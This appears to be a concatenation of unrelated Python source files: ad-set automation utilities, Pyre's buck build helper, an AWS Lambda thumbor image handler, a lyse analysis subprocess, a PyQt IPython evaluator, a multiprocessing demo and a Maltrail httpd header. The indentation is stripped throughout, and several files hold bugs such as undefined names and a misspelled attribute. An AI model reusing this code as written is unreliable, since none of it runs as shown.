x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.user_device = adset.user_device
if adset.user_os:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.user_os = adset.user_os
if adset.age_min:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.age_min = adset.age_min
if adset.age_max:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.age_max = adset.age_max
if adset.genders:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.genders = [adset.genders]
if adset.geo_locations:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.geo_locations = {'countries': adset.geo_locations, 'location_types': ['home', 'recent']}
if adset.status:
x.status = adset.status
if adset.flexible_spec1:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = []
x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_spec1:
x.targeting.flexible_spec[-1]["interests"].append({"name":i, "id":j})
if adset.flexible_spec2:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = []
x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_spec2:
x.targeting.flexible_spec[-1]["interests"].append({"name":i, "id":j})
if adset.flexible_spec3:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = []
x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_spec3:
x.targeting.flexible_spec[-1]["interests"].append({"name":i, "id":j})
if adset.flexible_spec4:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = []
x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_sspec4:
x.targeting.flexible_spec[-1]["interests"].append({"name":i, "id":j})
if adset.flexible_spec5:
x.targeting = {} if "targeting" not in x else x.targeting
x.targeting.flexible_spec = []
x.targeting.flexible_spec.append({})
x.targeting.flexible_spec[-1]["interests"] = []
for i,j in adset.flexible_spec5:
x.targeting.flexible_spec[-1]["interests"].append({"name":i, "id":j})
x.targeting = dict(x.targeting)
try:x.promoted_object = dict(x.promoted_object)
except Exception as e:print(e)
x = dict(x)
return x
def algorithm4(self,id):
a_shop()
adset = Get(Adset,adset_id=id)
if adset.status=="ACTIVE":
data = keysort("date", Adsethourlyinsight.objects.filter(adset_id=adset.adset_id), tcer=False)
impressions = 0; sales = 0
for x in data:
impressions+=x.impression
sales+=x.website_purchase
print(impressions, sales)
if impressions > 500:
if sales < 1:
print("stop")
print("[adset_id][%s]"%adset.adset_id)
input("please check it, impressions: %s, sales: %s" % (impressions, sales))
AdSet(adset.adset_id).remote_update(params={"status":"PAUSED"})
break
def update_advertisement_all(self, id):
# OSA.log("1")
July_Adset_Utilities().update_adset(id=id)
# OSA.log("2")
July_Adset_Utilities().update_adset_targeting_data(id=id)
# OSA.log("3")
July_Adset_Utilities().update_adsetinsight_data(id=id)
# OSA.log("4")
July_Adset_Utilities().update_adsethourlyinsight_data(id=id)
# OSA.log("5")
July_Adset_Utilities().stop_adset_based_on_today_data(id=id)
# OSA.log("6")
July_Adset_Utilities().stop_adset_based_on_past_data(id=id)
# OSA.log("7")
July_Adset_Utilities().restart_adset_based_on_today_data(id=id)
# OSA.log("8")
July_Adset_Utilities().algorithm4(id=id)
# OSA.log("I")
July_Adset_Utilities().update_ad_keyword_data(id=id)
# OSA.log("J")
x = datetime.now()
Update(Get(Adset,adset_id=id),last_check=datetime.now())
# OSA.log("L")
return x.strftime("%Y,%m,%d,%H,%M,%S")
def update_advertisements(self,shop):
for i in Filter(Adset,shop_abbreviation=shop):
July_Adset_Utilities().update_advertisement_all(i.adset_id)
def tests(self):
#July_Adset_Utilities().update_adsets()
#July_Adset_Utilities().update_adsetinsight_data(date_start = 30, date_end = 0)
#data = CSV().pick_data(Adsetinsight.objects.all(), ["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment","reach","reach_cost","reach_rate","landing_page_view","landing_page_view_cost","landing_page_view_rate","fb_pixel_view_content","fb_pixel_view_content_cost","fb_pixel_view_content_rate","fb_pixel_initiate_checkout","fb_pixel_initiate_checkout_cost","fb_pixel_initiate_checkout_rate","page_engagement","page_engagement_cost","page_engagement_rate","post_engagement","post_engagement_cost","post_engagement_rate","post_reaction","post_reaction_cost","post_reaction_rate"])
#CSV().DictWriteWithHeaders("out.csv", data, headers=["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment","reach","reach_cost","reach_rate","landing_page_view","landing_page_view_cost","landing_page_view_rate","fb_pixel_view_content","fb_pixel_view_content_cost","fb_pixel_view_content_rate","fb_pixel_initiate_checkout","fb_pixel_initiate_checkout_cost","fb_pixel_initiate_checkout_rate","page_engagement","page_engagement_cost","page_engagement_rate","post_engagement","post_engagement_cost","post_engagement_rate","post_reaction","post_reaction_cost","post_reaction_rate"])
CSV().dictlist_to_xlsx(Adsetinsight.objects.all(), ["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment","reach","reach_cost","reach_rate","landing_page_view","landing_page_view_cost","landing_page_view_rate","fb_pixel_view_content","fb_pixel_view_content_cost","fb_pixel_view_content_rate","fb_pixel_initiate_checkout","fb_pixel_initiate_checkout_cost","fb_pixel_initiate_checkout_rate","page_engagement","page_engagement_cost","page_engagement_rate","post_engagement","post_engagement_cost","post_engagement_rate","post_reaction","post_reaction_cost","post_reaction_rate"],
workbook = ".xlsx", sheet="sheet" )
July_Adset_Utilities().stop_adsets_based_on_today_data()
July_Adset_Utilities().stop_adsets_based_on_past_data()
July_Adset_Utilities().restart_adsets_based_on_today_data()
|
buck.py
|
# Copyright 2004-present Facebook. All rights reserved.
import functools
import glob
import json
import logging
import os
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from json.decoder import JSONDecodeError
from logging import Logger
from typing import Dict, Iterable, List, NamedTuple, Optional, Set, Tuple
from .filesystem import find_root
LOG: Logger = logging.getLogger(__name__)
class BuckOut(NamedTuple):
source_directories: Set[str]
targets_not_found: Set[str]
class BuckException(Exception):
pass
class BuckBuilder:
def build(self, targets: Iterable[str]) -> Iterable[str]:
"""
Build the given targets, and return a list of output directories
containing the target output.
"""
raise NotImplementedError
class FastBuckBuilder(BuckBuilder):
def __init__(
self,
buck_root: str,
output_directory: Optional[str] = None,
buck_builder_binary: Optional[str] = None,
debug_mode: bool = False,
buck_mode: Optional[str] = None,
project_name: Optional[str] = None,
) -> None:
self._buck_root = buck_root
self._output_directory: str = output_directory or tempfile.mkdtemp(
prefix="pyre_tmp_"
)
self._buck_builder_binary = buck_builder_binary
self._debug_mode = debug_mode
self._buck_mode = buck_mode
self._project_name = project_name
self.conflicting_files: List[str] = []
self.unsupported_files: List[str] = []
def _get_builder_executable(self) -> str:
builder_binary = self._buck_builder_binary
if builder_binary is None:
raise BuckException(
"--buck-builder-binary must be provided "
"if fast buck builder is used."
)
return builder_binary
def build(self, targets: Iterable[str]) -> List[str]:
command = [
self._get_builder_executable(),
"-J-Djava.net.preferIPv6Addresses=true",
"-J-Djava.net.preferIPv6Stack=true",
"--buck_root",
self._buck_root,
"--output_directory",
self._output_directory,
] + list(targets)
if self._debug_mode:
command.append("--debug")
buck_mode = self._buck_mode
if buck_mode:
command.extend(["--mode", buck_mode])
project_name = self._project_name
if project_name:
command.extend(["--project_name", project_name])
LOG.info("Building buck targets...")
LOG.debug("Buck builder command: `{}`".format(" ".join(command)))
with subprocess.Popen(
command,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
) as buck_builder_process:
# Java's logging conflicts with Python's logging, we capture the
# logs and re-log them with python's logger.
log_processor = threading.Thread(
target=self._read_stderr, args=(buck_builder_process.stderr,)
)
log_processor.daemon = True
log_processor.start()
return_code = buck_builder_process.wait()
# Wait until all stderr have been printed.
log_processor.join()
if return_code == 0:
LOG.info("Finished building targets.")
if self._debug_mode:
# pyre-fixme[6]: Expected `_Reader` for 1st param but got
# `Optional[typing.IO[typing.Any]]`.
debug_output = json.load(buck_builder_process.stdout)
self.conflicting_files += debug_output["conflictingFiles"]
self.unsupported_files += debug_output["unsupportedFiles"]
return [self._output_directory]
else:
raise BuckException(
f"Failed to build targets with:\n`{' '.join(command)}`"
)
def _read_stderr(
self, stream: Iterable[str], default_logging_section: int = logging.INFO
) -> None:
for line in stream:
line = line.rstrip()
if line.startswith("INFO: "):
LOG.info(line[6:])
elif line.startswith("WARNING: "):
LOG.warning(line[9:])
elif line.startswith("ERROR: "):
LOG.error(line[7:])
elif line.startswith("[WARNING:"):
# Filter away thrift warnings.
pass
else:
LOG.log(default_logging_section, line)
class SimpleBuckBuilder(BuckBuilder):
def build(self, targets: Iterable[str]) -> Iterable[str]:
"""
Shell out to buck to build the targets, then yield the paths to the
link trees.
"""
return generate_source_directories(targets)
def presumed_target_root(target: str) -> str:
root_index = target.find("//")
if root_index != -1:
target = target[root_index + 2 :]
target = target.replace("/...", "")
target = target.split(":")[0]
return target
# Expects the targets to be already normalized.
def _find_built_source_directories(
targets_to_destinations: Iterable[Tuple[str, str]]
) -> BuckOut:
targets_not_found = []
source_directories = []
buck_root = find_buck_root(os.getcwd())
if buck_root is None:
raise Exception("No .buckconfig found in ancestors of the current directory.")
directories = set()
for target, destination in targets_to_destinations:
directories.add((target, os.path.dirname(destination)))
for target, directory in directories:
target_name = target.split(":")[1]
discovered_source_directories = glob.glob(
os.path.join(buck_root, directory, "{}#*link-tree".format(target_name))
)
if len(discovered_source_directories) == 0:
targets_not_found.append(target)
source_directories.extend(
[
tree
for tree in discovered_source_directories
if not tree.endswith(
(
"-vs_debugger#link-tree",
"-interp#link-tree",
"-ipython#link-tree",
)
)
]
)
return BuckOut(set(source_directories), set(targets_not_found))
def _normalize(targets: List[str]) -> List[Tuple[str, str]]:
LOG.info(
"Normalizing target%s `%s`",
"s:" if len(targets) > 1 else "",
"`, `".join(targets),
)
try:
command = (
["buck", "targets", "--show-output"]
+ targets
+ ["--type", "python_binary", "python_test"]
)
targets_to_destinations: List[str] = (
subprocess.check_output(command, stderr=subprocess.PIPE, timeout=600)
.decode()
.strip()
.split("\n")
)
targets_to_destinations = list(filter(bool, targets_to_destinations))
# The output is of the form //target //corresponding.par
result = []
for target in targets_to_destinations:
pair = target.split(" ")
if len(pair) != 2:
pass
else:
result.append((pair[0], pair[1]))
if not result:
LOG.warning(
"Provided targets do not contain any binary or unittest targets."
)
return []
else:
LOG.info(
"Found %d buck target%s.", len(result), "s" if len(result) > 1 else ""
)
return result
except subprocess.TimeoutExpired as error:
LOG.error("Buck output so far: %s", error.stderr.decode().strip())
raise BuckException(
"Seems like `{}` is hanging.\n "
"Try running `buck clean` before trying again.".format(
" ".join(command[:-1])
)
)
except subprocess.CalledProcessError as error:
LOG.error("Buck returned error: %s" % error.stderr.decode().strip())
raise BuckException(
"Could not normalize targets. Check the paths or run `buck clean`."
)
def _build_targets(targets: List[str], original_targets: List[str]) -> None:
LOG.info(
"Building target%s `%s`",
"s:" if len(original_targets) > 1 else "",
"`, `".join(original_targets),
)
command = ["buck", "build"] + targets
try:
subprocess.check_output(command, stderr=subprocess.PIPE)
LOG.warning("Finished building targets.")
except subprocess.CalledProcessError as error:
# The output can be overwhelming, hence print only the last 20 lines.
lines = error.stderr.decode().splitlines()
LOG.error("Buck returned error: %s" % "\n".join(lines[-20:]))
raise BuckException(
"Could not build targets. Check the paths or run `buck clean`."
)
def _map_normalized_targets_to_original(
unbuilt_targets: Iterable[str], original_targets: Iterable[str]
) -> List[str]:
mapped_targets = set()
for target in unbuilt_targets:
# Each original target is either a `/...` glob or a proper target.
# If it's a glob, we're looking for the glob to be a prefix of the unbuilt
# target. Otherwise, we care about exact matches.
name = None
for original in original_targets:
if original.endswith("/..."):
if target.startswith(original[:-4]):
name = original
else:
if target == original:
name = original
# No original target matched, fallback to normalized.
if name is None:
name = target
mapped_targets.add(name)
return list(mapped_targets)
@functools.lru_cache()
def find_buck_root(path: str) -> Optional[str]:
return find_root(path, ".buckconfig")
def query_buck_relative_paths(
project_paths: Iterable[str], targets: Iterable[str]
) -> Dict[str, str]:
"""Return a mapping from each absolute project path to its relative location
in the buck output directory.
This queries buck and only returns paths that are covered by `targets`."""
buck_root = find_buck_root(os.getcwd())
if buck_root is None:
LOG.error(
"Buck root couldn't be found. Returning empty analysis directory mapping."
)
return {}
target_string = " ".join(targets)
command = [
"buck",
"query",
"--json",
"--output-attribute",
".*",
# This will get only those owner targets that are beneath our targets or
# the dependencies of our targets.
f"owner(%s) ^ deps(set({target_string}))",
*project_paths,
]
LOG.info(f"Running command: {command}")
try:
owner_output = json.loads(
subprocess.check_output(command, timeout=30, stderr=subprocess.DEVNULL)
.decode()
.strip()
)
except (
subprocess.TimeoutExpired,
subprocess.CalledProcessError,
JSONDecodeError,
) as error:
raise BuckException("Querying buck for relative paths failed: {}".format(error))
results = {}
for project_path in project_paths:
for target_data in owner_output.values():
prefix = os.path.join(buck_root, target_data["buck.base_path"]) + os.sep
suffix = project_path[len(prefix) :]
if not project_path.startswith(prefix) or suffix not in target_data["srcs"]:
continue
if "buck.base_module" in target_data:
base_path = os.path.join(*target_data["buck.base_module"].split("."))
elif "base_module" in target_data:
base_path = os.path.join(*target_data["base_module"].split("."))
else:
base_path = target_data["buck.base_path"]
results[project_path] = os.path.join(base_path, target_data["srcs"][suffix])
# Break after the first one because there might be multiple matches.
break
return results
def generate_source_directories(original_targets: Iterable[str]) -> Set[str]:
original_targets = list(original_targets)
targets_to_destinations = _normalize(original_targets)
targets = [pair[0] for pair in targets_to_destinations]
_build_targets(targets, original_targets)
buck_out = _find_built_source_directories(targets_to_destinations)
source_directories = buck_out.source_directories
if buck_out.targets_not_found:
message_targets = _map_normalized_targets_to_original(
buck_out.targets_not_found, original_targets
)
raise BuckException(
"Could not find link trees for:\n `{}`.\n "
"See `{} --help` for more information.".format(
" \n".join(message_targets), sys.argv[0]
)
)
return source_directories
|
lambda_function.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
##############################################################################
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Amazon Software License (the "License"). You may not #
# use this file except in compliance with the License. A copy of the #
# License is located at #
# #
# http://aws.amazon.com/asl/ #
# #
# or in the "license" file accompanying this file. This file is distributed #
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, #
# express or implied. See the License for the specific language governing #
# permissions and limitations under the License. #
##############################################################################
from __future__ import print_function
import cStringIO
import base64
import requests_unixsocket
import threading
import time
import mimetypes
import traceback
import os.path
import json
import os
import timeit
import ast
from image_handler import lambda_metrics
from image_handler import lambda_rewrite
from PIL import Image
from io import BytesIO
from distutils.util import strtobool
from tornado.httpserver import HTTPServer
from tornado.netutil import bind_unix_socket
from tornado.options import options, define
from thumbor.console import get_server_parameters
from thumbor.context import ServerParameters
from thumbor.server import *
thumbor_config_path = '/var/task/image_handler/thumbor.conf'
thumbor_socket = '/tmp/thumbor'
unix_path = 'http+unix://%2Ftmp%2Fthumbor'
def response_formater(status_code='400',
body={'message': 'error'},
cache_control='max-age=120,public',
content_type='application/json',
expires='',
etag='',
date='',
vary=False
):
api_response = {
'statusCode': status_code,
'headers': {
'Content-Type': content_type
}
}
if str(os.environ.get('ENABLE_CORS')).upper() == "YES":
api_response['headers']['Access-Control-Allow-Origin'] = os.environ.get('CORS_ORIGIN')
if int(status_code) != 200:
api_response['body'] = json.dumps(body)
api_response['Cache-Control'] = cache_control
else:
api_response['body'] = body
api_response['isBase64Encoded'] = 'true'
api_response['headers']['Expires'] = expires
api_response['headers']['Etag'] = etag
api_response['headers']['Cache-Control'] = cache_control
api_response['headers']['Date'] = date
if vary:
api_response['headers']['Vary'] = vary
logging.debug(api_response)
return api_response
def run_server(application, context):
server = HTTPServer(application)
define(
'unix_socket',
group='webserver',
default=thumbor_socket,
help='Path to unix socket to bind')
socket = bind_unix_socket(options.unix_socket)
server.add_socket(socket)
server.start(1)
def stop_thumbor():
return None
tornado.ioloop.IOLoop.instance().stop()
try:
os.remove(thumbor_socket)
except OSError as error:
logging.error('stop_thumbor error: %s' % (error))
def start_thumbor():
try:
server_parameters = ServerParameters(
port=8888,
ip='0.0.0.0',
config_path=None,
keyfile=False,
log_level=log_level,
app_class='thumbor.app.ThumborServiceApp')
global config
config = get_config(thumbor_config_path)
config.allow_environment_variables()
configure_log(config, server_parameters.log_level)
importer = get_importer(config)
os.environ["PATH"] += os.pathsep + '/var/task'
validate_config(config, server_parameters)
with get_context(server_parameters, config, importer) as thumbor_context:
application = get_application(thumbor_context)
run_server(application, thumbor_context)
tornado.ioloop.IOLoop.instance().start()
logging.info(
'thumbor running at %s:%d' %
(thumbor_context.server.ip, thumbor_context.server.port)
)
return config
except RuntimeError as error:
if str(error) != "IOLoop is already running":
logging.error('start_thumbor RuntimeError: %s' % (error))
stop_thumbor()
except Exception as error:
stop_thumbor()
logging.error('start_thumbor error: %s' % (error))
logging.error('start_thumbor trace: %s' % traceback.format_exc())
def start_server():
t = threading.Thread(target=start_thumbor)
t.daemon = True
t.start()
return t
def restart_server():
threads = threading.enumerate()
main_thread = threading.current_thread()
for t in threads:
if t is not main_thread:
t.exit()
t.join()
start_server()
def auto_webp(original_request, request_headers):
headers = {'Accept':'*/*'}
vary = bool(strtobool(str(config.AUTO_WEBP)))
if vary:
if original_request.get('headers'):
if original_request['headers'].get('Accept'):
request_headers['Accept'] = original_request['headers']['Accept']
return vary, request_headers
def allow_unsafe_url(http_path):
if bool(strtobool(str(config.ALLOW_UNSAFE_URL))):
http_path = '/unsafe' + http_path
return http_path
def rewrite(http_path):
if str(os.environ.get('REWRITE_ENABLED')).upper() == 'YES':
http_path = lambda_rewrite.match_patterns(http_path)
return http_path
def is_thumbor_down():
if not os.path.exists(thumbor_socket):
start_server()
session = requests_unixsocket.Session()
http_health = '/healthcheck'
retries = 10
while(retries > 0):
try:
response = session.get(unix_path + http_health)
if (response.status_code == 200):
break
except Exception as error:
time.sleep(0.03)
retries -= 1
continue
if retries <= 0:
logging.error(
'call_thumbor error: tornado server unavailable,\
proceeding with tornado server restart'
)
restart_server()
return response_formater(status_code='502')
return False, session
def request_thumbor(original_request, session):
http_path = original_request['path']
http_path = rewrite(http_path);
http_path = allow_unsafe_url(http_path)
request_headers = {}
vary, request_headers = auto_webp(original_request, request_headers)
return session.get(unix_path + http_path, headers=request_headers), vary
def process_thumbor_responde(thumbor_response, vary):
if thumbor_response.status_code != 200:
return response_formater(status_code=response.status_code)
if vary:
vary = thumbor_response.headers['vary']
content_type = thumbor_response.headers['content-type']
body = gen_body(content_type, thumbor_response.content)
if body is None:
return response_formater(status_code='500',
cache_control='no-cache,no-store')
return response_formater(status_code='200',
body=body,
cache_control=thumbor_response.headers['Cache-Control'],
content_type=content_type,
expires=thumbor_response.headers['Expires'],
etag=thumbor_response.headers['Etag'],
date=thumbor_response.headers['Date'],
vary=vary
)
def call_thumbor(original_request):
thumbor_down, session = is_thumbor_down()
if thumbor_down:
return thumbor_down
thumbor_response, vary = request_thumbor(original_request, session)
return process_thumbor_responde(thumbor_response, vary)
def gen_body(ctype, content):
'''Convert image to base64 to be sent as body response. '''
try:
format_ = ctype[ctype.find('/')+1:]
supported = ['jpeg', 'png', 'gif']
if format_ not in supported:
None
return base64.b64encode(content)
except Exception as error:
logging.error('gen_body error: %s' % (error))
logging.error('gen_body trace: %s' % traceback.format_exc())
return None
def send_metrics(event, result, start_time):
t = threading.Thread(
target=lambda_metrics.send_data,
args=(event, result, start_time, )
)
t.start()
return t
def lambda_handler(event, context):
try:
start_time = timeit.default_timer()
global log_level
log_level = str(os.environ.get('LOG_LEVEL')).upper()
if log_level not in [
'DEBUG', 'INFO',
'WARNING', 'ERROR',
'CRITICAL'
]:
log_level = 'ERROR'
logging.getLogger().setLevel(log_level)
if event['requestContext']['httpMethod'] != 'GET' and\
event['requestContext']['httpMethod'] != 'HEAD':
return response_formater(status_code=405)
result = call_thumbor(event)
if str(os.environ.get('SEND_ANONYMOUS_DATA')).upper() == 'YES':
send_metrics(event, result, start_time)
return result
except Exception as error:
logging.error('lambda_handler error: %s' % (error))
logging.error('lambda_handler trace: %s' % traceback.format_exc())
return response_formater(status_code='500',
cache_control='no-cache,no-store')
|
analysis_subprocess.py
|
#####################################################################
# #
# /analysis_subprocess.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program lyse, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
import excepthook
import matplotlib
matplotlib.use("GTKAgg")
import lyse
lyse.spinning_top = True
import lyse.figure_manager
import sys
import os
import threading
import traceback
import time
import gtk
import gobject
from matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas
from matplotlib.backends.backend_gtkagg import NavigationToolbar2GTKAgg as NavigationToolbar
import pylab
import zlock, h5_lock, h5py
import subproc_utils
from filewatcher.modulewatcher import ModuleWatcher
if not sys.stdout.isatty():
# Prevent bug on windows where writing to stdout without a command
# window causes a crash:
sys.stdout = sys.stderr = open(os.devnull,'w')
if os.name == 'nt':
# Make it not look so terrible (if icons and themes are installed):
settings = gtk.settings_get_default()
settings.set_string_property('gtk-icon-theme-name', 'gnome-human', '')
settings.set_string_property('gtk-theme-name', 'Clearlooks', '')
settings.set_string_property('gtk-font-name', 'ubuntu 9', '')
# Have Windows 7 consider this program to be a separate app, and not
# group it with other Python programs in the taskbar:
import ctypes
myappid = 'monashbec.labscript.lyse.1-0' # arbitrary string
try:
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
except:
pass
class AnalysisWorker(object):
def __init__(self, filepath, to_parent, from_parent):
self.to_parent = to_parent
self.from_parent = from_parent
self.filepath = filepath
# Keeping track of figures and canvases:
self.figures = []
self.canvases = []
self.windows = {}
# Whether or not to autoscale each figure with new data:
self.autoscaling = {}
# An object with a method to unload user modules if any have
# changed on disk:
self.modulewatcher = ModuleWatcher()
# Start the thread that listens for instructions from the
# parent process:
self.mainloop_thread = threading.Thread(target=self.mainloop)
self.mainloop_thread.daemon = True
self.mainloop_thread.start()
def mainloop(self):
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
while True:
task, data = self.from_parent.get()
with kill_lock:
if task == 'quit':
with gtk.gdk.lock:
gtk.main_quit()
elif task == 'reset figs':
self.reset_figs()
elif task == 'single' or task == 'multi':
try:
self.do_analysis(task,data)
self.to_parent.put(['done',None])
except:
traceback_lines = traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback)
del traceback_lines[1:3]
message = ''.join(traceback_lines)
sys.stderr.write(message)
self.to_parent.put(['error', message])
else:
self.to_parent.put(['error','invalid task %s'%str(task)])
def do_analysis(self,task,path):
axis_limits = {}
with gtk.gdk.lock:
for f in self.figures:
for i, a in enumerate(f.axes):
# Save the limits of the axes to restore them afterward:
axis_limits[f,i] = a.get_xlim(), a.get_ylim()
f.clear()
# The namespace the routine will run in:
sandbox = {'path':path,'__file__':self.filepath,'__name__':'__main__'}
# Do not let the modulewatcher unload any modules whilst we're working:
with self.modulewatcher.lock:
# Actually run the user's analysis!
execfile(self.filepath,sandbox,sandbox)
# reset the current figure to figure 1:
lyse.figure_manager.figuremanager.set_first_figure_current()
# Introspect the figures that were produced:
with gtk.gdk.lock:
for identifier, fig in lyse.figure_manager.figuremanager.figs.items():
if not fig.axes:
continue
elif not fig in self.figures:
# If we don't already have this figure, make a window
# to put it in:
gobject.idle_add(self.new_figure,fig,identifier)
else:
gobject.idle_add(self.update_window_title_idle, self.windows[fig], identifier)
if not self.autoscaling[fig].get_active():
# Restore the axis limits:
for j, a in enumerate(fig.axes):
a.autoscale(enable=False)
try:
xlim, ylim = axis_limits[fig,j]
a.set_xlim(xlim)
a.set_ylim(ylim)
except KeyError:
continue
else:
for j, a in enumerate(fig.axes):
a.autoscale(enable=True)
# Redraw all figures:
with gtk.gdk.lock:
for canvas in self.canvases:
canvas.draw()
def update_window_title_idle(self, window, identifier):
with gtk.gdk.lock:
self.update_window_title(window,identifier)
def update_window_title(self, window, identifier):
window.set_title(str(identifier) + ' - ' + os.path.basename(self.filepath))
def new_figure(self, fig, identifier):
with gtk.gdk.lock:
window = gtk.Window()
self.update_window_title(window, identifier)
l, w = fig.get_size_inches()
window.resize(int(l*100),int(w*100))
window.set_icon_from_file('lyse.svg')
c = FigureCanvas(fig)
v = gtk.VBox()
n = NavigationToolbar(c,window)
b = gtk.ToggleButton('Autoscale')
v.pack_start(b,False,False)
v.pack_start(c)
v.pack_start(n,False,False)
window.add(v)
window.show_all()
window.present()
self.canvases.append(c)
self.figures.append(fig)
self.autoscaling[fig] = b
self.windows[fig] = window
def reset_figs(self):
pass
if __name__ == '__main__':
gtk.threads_init()
##########
# import tracelog
# tracelog.log('tracelog_analysis_subprocess',['__main__','subproc_utils','lyse','filewatcher'])
##########
to_parent, from_parent, kill_lock = subproc_utils.setup_connection_with_parent(lock = True)
filepath = from_parent.get()
# Set a meaningful client id for zlock:
zlock.set_client_process_name('lyse-'+os.path.basename(filepath))
####
# tracelog.set_file('tracelog_%s.log'%os.path.basename(filepath))
####
worker = AnalysisWorker(filepath, to_parent, from_parent)
with gtk.gdk.lock:
gtk.main()
|
evaluate.py
|
import sys
import multiprocessing as mp
import multiprocessing.queues as mpq
from IPython.core.interactiveshell import InteractiveShell
from IPython.utils import io
from PyQt5.QtCore import QObject, QThread, pyqtSignal
class StdoutQueue(mpq.Queue):
"""
Multiprocessing Queue to be used in place of a simple file descriptor.
https://stackoverflow.com/a/39508408
"""
def __init__(self, *args, **kwargs):
ctx = mp.get_context()
super().__init__(*args, **kwargs, ctx=ctx)
def write(self, msg):
self.put(msg)
def flush(self):
sys.__stdout__.flush()
class QueueMonitor(QThread):
def __init__(self, queue, signal):
super().__init__()
self.queue = queue
self.signal = signal
self.start()
def __del__(self):
self.terminate()
self.wait()
def run(self):
while True:
self.signal.emit(self.queue.get())
def process(conn, stdout):
shell = InteractiveShell()
orig, sys.stdout = sys.stdout, stdout
execRes = shell.run_cell(conn.recv())
sys.stdout = orig
res = (execRes.result, execRes.error_before_exec or execRes.error_in_exec)
conn.send(res)
class Signals(QObject):
started = pyqtSignal()
finished = pyqtSignal()
result = pyqtSignal(object)
error = pyqtSignal()
stdout = pyqtSignal(str)
class ProcessManager(QThread):
def __init__(self):
super().__init__()
self.signals = Signals()
self.busy = False
self.proc = None
self.pipe = mp.Pipe()
self.stout = StdoutQueue()
self.stoutMonitor = QueueMonitor(self.stout, self.signals.stdout)
# def __del__(self):
# if self.isRunning():
# self.stop()
def run(self):
while True:
# manager and process ends of a pipe
(mgrConn, procConn) = self.pipe
args = (procConn, self.stout)
p = self.proc = mp.Process(target=process, args=args, daemon=True)
p.start()
p.join()
p.close()
self.busy = False
# if process was not interrupted, we have a (result, exception)
if mgrConn.poll():
badType = False
try:
res, exc = mgrConn.recv()
badType = type(res) != dict
except AttributeError:
badType = True
if not exc and badType:
err = "\nError: Return type must be a dict " \
"containing only primitives and collections."
self.signals.stdout.emit(err)
self.signals.error.emit()
continue
if exc:
self.signals.error.emit()
else:
self.signals.result.emit(res)
self.signals.finished.emit()
if self.isInterruptionRequested():
break
def stop(self):
"""Terminate the process and interrupt the thread."""
self.requestInterruption()
self.stopEvaluation()
self.wait()
def isEvaluating(self):
return self.busy
def startEvaluation(self, raw):
"""Evaluate raw code with process"""
assert(not self.isEvaluating())
self.busy = True
(mgrConn, procConn) = self.pipe
# clear any waiting code
while procConn.poll():
procConn.recv()
mgrConn.send(raw)
self.signals.started.emit()
def stopEvaluation(self):
# terminate the current process
self.proc.terminate()
# wait until process is no longer running
while self.busy:
pass
# may need to resort to .kill()
if __name__ == '__main__':
app = QCoreApplication(sys.argv)
ph = ProcessHandler()
ph.completed.connect(print)
ph.start()
ph.evaluate('1+1')
ph.evaluate("print('hello world')")
sys.exit(app.exec_())
|
manager.py
|
from multiprocessing import Process, Manager, current_process
import os, time, signal, sys
def f(d, l):
def _sh(sig, _):
if sig == signal.SIGTERM:
print "_sh -> c: {0}, p: {1}".format(os.getpid(), os.getppid())
sys.exit(0)
signal.signal(signal.SIGTERM, _sh)
d[1] = '1'
d['2'] = 2
d[0.25] = None
l.reverse()
print "f -> c: {0}, p: {1}".format(os.getpid(), os.getppid())
try:
while True:
time.sleep(1000)
finally:
print "exiting..."
def main(d, l):
print "main -> c: {0}, p: {1}".format(os.getpid(), os.getppid())
p = Process(target=f, args=(d, l))
p.start()
p.join(2)
p.terminate()
print d
print l
if __name__ == '__main__':
manager = Manager()
d = manager.dict()
l = manager.list(range(10))
main(d, l)
|
httpd.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2021 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import datetime
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import subprocess
